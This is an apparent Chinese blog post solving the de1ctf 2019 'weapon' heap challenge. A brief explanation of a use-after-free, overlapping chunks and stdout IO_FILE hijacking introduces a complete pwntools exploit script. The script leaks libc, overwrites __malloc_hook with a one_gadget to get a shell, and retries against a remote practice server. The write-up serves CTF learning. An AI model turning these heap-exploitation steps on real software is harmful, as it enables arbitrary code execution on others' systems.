de1ctf_2019_weapon(16/100)

思路

這題其實挺基礎(chǔ)的,有UAF,沒有show,考慮IO_FILE泄露libc
因為有UAF,所以可以用overlap來偽造一個chunk實現(xiàn)踩unsortbin
有幾個點
1.add最大只能申請0x60,所以最后踩unsortbin的時候要考慮到踩到以后去申請不了的問題,同時構(gòu)造一個fastbin的同fd鏈表,在chunk大小上要注意
2.overlap要考慮到fastbin檢測吧,stdout劫持也是。因為是ubuntu16

EXP

from pwn import *

#p = process("./de1ctf_2019_weapon")
#p = remote('node4.buuoj.cn','27248')
# context.log_level = 'debug'
elf = ELF("./de1ctf_2019_weapon")
libc = ELF('./libc-2.23.so')
gadgets = [0x45216,0x4526a,0xf02a4,0xf1147]
s       = lambda data               :p.send(data)
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(data)
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
uu32    = lambda                    :u32(p.recvuntil("\xf7",timeout = 1)[-4:].ljust(4,"\x00"))
uu64    = lambda                    :u64(p.recvuntil("\x7f",timeout = 1)[-6:].ljust(8,"\x00"))
lg      = lambda name,data          :p.success(name + "-> 0x%x" % data)

def cmd(choice):
    sla('choice >> ',choice)

def add(idx,size,content):
    cmd(1)
    sla('wlecome input your size of weapon: ',size)
    sla('input index: ',idx)
    p.sendafter('input your name:',content)

def edit(idx,content):
    cmd(3)
    sla('input idx:',idx)
    p.sendafter('new content:',content)

def delete(idx):
    cmd(2)
    sla('input idx :',idx)

def dbg():
    gdb.attach(p)
    pause()

def pwn():

    add(0,0x30,'a')
    add(1,0x30,'a')
    add(2,0x30,'a'*0x20 + p64(0xa0)+p64(0x21))
    add(3,0x10,p64(0x20)+p64(0x21))
    edit(0,p64(0)+p64(0x41))
    delete(2)
    delete(1)
    edit(1,'\x10')
    add(1,0x30,'a')
    add(2,0x30,'a')
    edit(0,p64(0)+p64(0x71))
    delete(2)
    edit(0,p64(0)+p64(0xa1))
    delete(2)
    edit(0,p64(0)+p64(0x71))
    edit(2,p8(0xdd)+p8(0x65))
    add(2,0x60,'a')
    add(4,0x60,'a'*51 + p64(0xfbad1800)+p64(0)*3 + p8(0x58))

    libc_leak = uu64()
    lg('libc_leak',libc_leak)
    libc_base = libc_leak - 0x3C56A3#gdb
    lg('libc_base',libc_base)
    if((libc_base&0xfff)!= 0):
        exit(-1)
    malloc_hook = libc_base + libc.sym['__malloc_hook']
    one_gadget = gadgets[3]+libc_base
    add(5,0x60,'a')
    delete(5)
    edit(5,p64(malloc_hook-0x23))
    add(6,0x60,'a')
    add(7,0x60,'a'*0x13 + p64(one_gadget))

    cmd(1)
    sla('wlecome input your size of weapon: ',0x10)
    sla('input index: ',8)


if __name__ == '__main__':
    while(True):
        try:
            # p = process('./de1ctf_2019_weapon')
            p = remote('node4.buuoj.cn','28089')
            pwn()
            p.interactive()
            break
        except:
            p.close()
            continue
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容